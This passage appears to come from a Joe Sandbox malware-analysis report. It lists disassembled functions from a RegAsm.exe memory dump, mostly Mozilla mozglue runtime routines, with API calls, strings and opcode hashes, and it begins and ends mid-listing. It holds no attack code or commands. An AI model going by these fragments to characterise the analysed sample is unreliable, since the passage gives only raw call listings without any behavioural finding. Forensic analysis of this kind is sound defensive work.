                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C73B5F4
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C73B605
                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C73B61F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C73B631
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C73B655
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 1276798925-0
                                                                                    • Opcode ID: 1ed4545835cf012ff2c4438d02a26028d399bcd53efecbc8c26856b869fe0a80
                                                                                    • Instruction ID: 08809304caabb07c25c5e5e15466e39d90c50069e56cc8db4b767e8534004ebe
                                                                                    • Opcode Fuzzy Hash: 1ed4545835cf012ff2c4438d02a26028d399bcd53efecbc8c26856b869fe0a80
                                                                                    • Instruction Fuzzy Hash: 2231F571B00514CBCB00EF68C9598AEB7B5FF8A329B144576D91697741DB30BD06CF91
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FFA80: GetCurrentThreadId.KERNEL32 ref: 6C6FFA8D
                                                                                      • Part of subcall function 6C6FFA80: AcquireSRWLockExclusive.KERNEL32(6C74F448), ref: 6C6FFA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C706727
                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7067C8
                                                                                      • Part of subcall function 6C714290: memcpy.VCRUNTIME140(?,?,6C722003,6C720AD9,?,6C720AD9,00000000,?,6C720AD9,?,00000004,?,6C721A62,?,6C722003,?), ref: 6C7142C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                    • String ID: data$vtl
                                                                                    • API String ID: 511789754-1574058162
                                                                                    • Opcode ID: 79d272ac9644d47cabfbebae3eaee25bc77c6f6dafe97bd77b1a534f1369f29c
                                                                                    • Instruction ID: d6b9a985822f43a77321c9e8fc437db2272def4701abab05f21ebda7ab9899d6
                                                                                    • Opcode Fuzzy Hash: 79d272ac9644d47cabfbebae3eaee25bc77c6f6dafe97bd77b1a534f1369f29c
                                                                                    • Instruction Fuzzy Hash: DFD1DFB5B083408FD720DF24C955B9FB7E5AFD5308F10892DE48987B91EB30A949CB92
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C6CEB57,?,?,?,?,?,?,?,?,?), ref: 6C6FD652
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C6CEB57,?), ref: 6C6FD660
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6CEB57,?), ref: 6C6FD673
                                                                                    • free.MOZGLUE(?), ref: 6C6FD888
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                    • String ID: Wll$|Enabled
                                                                                    • API String ID: 4142949111-1183618018
                                                                                    • Opcode ID: 381ca74e2798863b89f969f2da89a696f6284403f336ddb5d073c85613e2aa8e
                                                                                    • Instruction ID: 499a28991ecc8356eca8b15e2502876c6e39058d148106323ecd434c681e3ee6
                                                                                    • Opcode Fuzzy Hash: 381ca74e2798863b89f969f2da89a696f6284403f336ddb5d073c85613e2aa8e
                                                                                    • Instruction Fuzzy Hash: E0A10570A043189FDB11CF69C4907EEBBF2AF4A318F14805DD8A9AB741C731B946CBA5
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,?,6C727ABE), ref: 6C6D985B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C727ABE), ref: 6C6D98A8
                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6C6D9909
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C6D9918
                                                                                    • free.MOZGLUE(?), ref: 6C6D9975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1281542009-0
                                                                                    • Opcode ID: fee08c2c787e9128d957709bdbdc02baa129f86c45fe84084b84f7c27e8e206a
                                                                                    • Instruction ID: 1c5049d60cd86e059b1d135803946cf929b5f361518200ec2e707ce873ea2f36
                                                                                    • Opcode Fuzzy Hash: fee08c2c787e9128d957709bdbdc02baa129f86c45fe84084b84f7c27e8e206a
                                                                                    • Instruction Fuzzy Hash: 59718B756047058FC725CF28C490956B7F1FF4A3287294AADE85A8BB90DB31F841CF95
                                                                                    APIs
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE,?,?,6C70DC2C), ref: 6C6DB7E6
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE,?,?,6C70DC2C), ref: 6C6DB80C
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE), ref: 6C6DB88E
                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE,?,?,6C70DC2C), ref: 6C6DB896
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                    • String ID:
                                                                                    • API String ID: 922945588-0
                                                                                    • Opcode ID: 4197a2779011ad0147c56b0c1b2678a0a80183e78612a85210c5b5e2086081a2
                                                                                    • Instruction ID: 2c95d064d365caee1545f6d19b4151b4da49950ff0525bf525f710ff9a92a872
                                                                                    • Opcode Fuzzy Hash: 4197a2779011ad0147c56b0c1b2678a0a80183e78612a85210c5b5e2086081a2
                                                                                    • Instruction Fuzzy Hash: AA517C35B006008FCB15DF59C494A6ABBF5FF89318B6A856DE99A8B355C731FC01CB84
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C711D0F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C711BE3,?,?,6C711D96,00000000), ref: 6C711D18
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C711BE3,?,?,6C711D96,00000000), ref: 6C711D4C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C711DB7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C711DC0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C711DDA
                                                                                      • Part of subcall function 6C711EF0: GetCurrentThreadId.KERNEL32 ref: 6C711F03
                                                                                      • Part of subcall function 6C711EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C711DF2,00000000,00000000), ref: 6C711F0C
                                                                                      • Part of subcall function 6C711EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C711F20
                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C711DF4
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1880959753-0
                                                                                    • Opcode ID: dce0d660aa7cf61c1e7fe869de962b55becd7c775879ee81b3006709fec8744b
                                                                                    • Instruction ID: 19d0c80018a1cec75fdb271be39c853741140db1b6a3cb505ea14b4c40b292b2
                                                                                    • Opcode Fuzzy Hash: dce0d660aa7cf61c1e7fe869de962b55becd7c775879ee81b3006709fec8744b
                                                                                    • Instruction Fuzzy Hash: ED41ABB52007049FCB10DF29C589A5ABBF9FF89318F14846EE99A87B41CB31F814CB95
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74E220,?,?,?,?,6C6D3899,?), ref: 6C6D38B2
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74E220,?,?,?,6C6D3899,?), ref: 6C6D38C3
                                                                                    • free.MOZGLUE(00000000,?,?,?,6C6D3899,?), ref: 6C6D38F1
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D3920
                                                                                    • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C6D3899,?), ref: 6C6D392F
                                                                                    • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C6D3899,?), ref: 6C6D3943
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C6D396E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                    • String ID:
                                                                                    • API String ID: 3047341122-0
                                                                                    • Opcode ID: 0bd0a39343a1edfa7743662994ed9f2768b056354554fba5e09a40f076c8aee1
                                                                                    • Instruction ID: 5edecf8cec15e14491ec45a02d681daac6e19e63ec10e67f0955ca7708f5dfff
                                                                                    • Opcode Fuzzy Hash: 0bd0a39343a1edfa7743662994ed9f2768b056354554fba5e09a40f076c8aee1
                                                                                    • Instruction Fuzzy Hash: 83210276600B20DFD720DF25C884B96B7B9EF45328F168439D95A9BB11D730F885CB94
                                                                                    APIs
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7084F3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70850A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70851E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70855B
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70856F
                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7085AC
                                                                                      • Part of subcall function 6C707670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C70767F
                                                                                      • Part of subcall function 6C707670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C707693
                                                                                      • Part of subcall function 6C707670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7076A7
                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7085B2
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                    • String ID:
                                                                                    • API String ID: 2666944752-0
                                                                                    • Opcode ID: b5f604e0d03d8b54e61bd7a9084756e42979462699865d080a0d27677568a879
                                                                                    • Instruction ID: c4338c71961ddc4ac823c15c00fefc74d170c0cd4011d736d3983bfeb5c444a4
                                                                                    • Opcode Fuzzy Hash: b5f604e0d03d8b54e61bd7a9084756e42979462699865d080a0d27677568a879
                                                                                    • Instruction Fuzzy Hash: FC216DB43006019FDB14DB24C988A6AB7F5AF4530DF24483DE55B87B41EB31E948CB51
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C6D1699
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16CB
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16D7
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16DE
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16E5
                                                                                    • VerSetConditionMask.NTDLL ref: 6C6D16EC
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6D16F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                    • String ID:
                                                                                    • API String ID: 375572348-0
                                                                                    • Opcode ID: 901a2e0ee559bceaf4f1b07c48e92f13ad8c3d53f66713923d9148e4efd1e334
                                                                                    • Instruction ID: e083a8925edb5af882d2bce33cb4caf875caafc899fd6ecd6f740fb1d5cf2f6c
                                                                                    • Opcode Fuzzy Hash: 901a2e0ee559bceaf4f1b07c48e92f13ad8c3d53f66713923d9148e4efd1e334
                                                                                    • Instruction Fuzzy Hash: 4B21D5B07402086FEB116A648C49FFBB37CDFC6718F418529F6059B5C1C6B4AD54C6A5
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D1EC
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D1F5
                                                                                      • Part of subcall function 6C71AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C71AE20
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D211
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71D217
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C71D226
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C71D279
                                                                                    • free.MOZGLUE(?), ref: 6C71D2B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                    • String ID:
                                                                                    • API String ID: 3049780610-0
                                                                                    • Opcode ID: ce7e4f1b60e25398961952c565d572ca465339949b72709d2a33a53b805038dc
                                                                                    • Instruction ID: 43878be19f5518990af737cd9aebf6f4a965c350c68dd1400fae24a2f1a17c1a
                                                                                    • Opcode Fuzzy Hash: ce7e4f1b60e25398961952c565d572ca465339949b72709d2a33a53b805038dc
                                                                                    • Instruction Fuzzy Hash: 1E217171604705DBCB05DF65C488A9EB7B5FF8A328F10863EE52687740DB30A809CB95
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C70F598), ref: 6C70F621
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C70F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 1579816589-753366533
                                                                                    • Opcode ID: 4ab6d1b8440fdaa7ebea4e4dc4314071b3bdb0fefb947ca995ce5da44acdbb74
                                                                                    • Instruction ID: 0b65866796d9a2ec97439e6482ad0ddeef060551140e8759cd00541f33fce3a8
                                                                                    • Opcode Fuzzy Hash: 4ab6d1b8440fdaa7ebea4e4dc4314071b3bdb0fefb947ca995ce5da44acdbb74
                                                                                    • Instruction Fuzzy Hash: E21182B5301604ABCB44AF69D6489AA77B9FB8636CF504027EA1587F01CB71AC15CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6C6D1C5F), ref: 6C6D20AE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6D20CD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D20E1
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D2124
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                    • API String ID: 4190559335-2476802802
                                                                                    • Opcode ID: 6b9695225293357723bab502bd4343ceefe76122e93ef24fe3bf06593faf39b7
                                                                                    • Instruction ID: 7f80cf8022f81e33bde549a6e9a8c6c90724c822b13c9c179098276a71bcf2c8
                                                                                    • Opcode Fuzzy Hash: 6b9695225293357723bab502bd4343ceefe76122e93ef24fe3bf06593faf39b7
                                                                                    • Instruction Fuzzy Hash: 52218E76200209EFDF11EF55DC48E9A7F7AFB4A369F11C026FA1492610D731A861DF64
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7276F2
                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6C727705
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C727717
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C72778F,00000000,00000000,00000000,00000000), ref: 6C727731
                                                                                    • free.MOZGLUE(00000000), ref: 6C727760
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                    • String ID: }>pl
                                                                                    • API String ID: 2538299546-4259265346
                                                                                    • Opcode ID: ecccafcea50d07453bd2edb813c3a6e69262bb67beb176003738c758561f3fce
                                                                                    • Instruction ID: 04820dbbae77af1c52c4c68b8b8d99a206a0627835a6a0d754c072a0912f923e
                                                                                    • Opcode Fuzzy Hash: ecccafcea50d07453bd2edb813c3a6e69262bb67beb176003738c758561f3fce
